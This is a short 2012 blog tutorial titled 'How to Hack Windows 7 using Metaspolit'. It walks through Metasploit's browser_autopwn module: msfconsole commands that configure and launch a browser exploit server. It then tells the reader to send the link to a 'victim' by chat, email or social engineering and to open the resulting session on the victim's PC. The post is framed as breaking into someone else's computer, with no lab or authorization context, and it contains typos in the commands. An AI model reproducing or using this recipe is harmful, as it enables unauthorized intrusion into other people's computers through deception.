Saturday, September 29, 2012

How to Hack Windows 7 using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement


metasploit

Windows 7

Open terminal type

msfconsole

use auxiliary/server/browser_autopwn

show options


Now set LHOST, PORT and URIPATH

Msf auxiliary(browser_autppwn) > set lhost 192.168.1.4 (The IP address of your computer )

Msf auxiliary(browser_autppwn) > set port 4444 (The default port of your Metasploit program)

Msf auxiliary(browser_autppwn) > set uripath /

Msf auxiliary(browser_autppwn) > exploit (to launch a exploit on targeted machine)

Send the link of the server to the victim via chat or email or any social engineering technique.

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

No comments:

Post a Comment

UA-35960349-1